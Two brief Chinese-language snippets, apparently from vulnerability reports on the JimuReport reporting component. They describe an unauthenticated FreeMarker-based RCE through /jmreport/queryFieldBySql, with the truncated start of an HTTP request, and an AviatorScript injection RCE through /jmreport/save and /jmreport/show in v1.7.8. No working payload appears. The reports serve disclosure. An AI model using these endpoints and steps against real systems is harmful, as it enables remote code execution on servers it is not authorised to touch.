以下的 Jimureport 组件库中都存在,由于未授权的 API/jmreport/queryFieldBySql使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。 POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: curl/7.88.1 Accept: */* Content-Type: application/json Content-Length: 1...
版本号: v1.7.8 问题描述: 积木报表软件存在AviatorScript代码注入RCE漏洞 使用接口/jmreport/save处在text中写入AviatorScript表达式 访问/jmreport/show触发AviatorScript解析从而导致命令执行。 错误截图: 访问官网,创建报表,在报表表格中写入AviatorScript表达式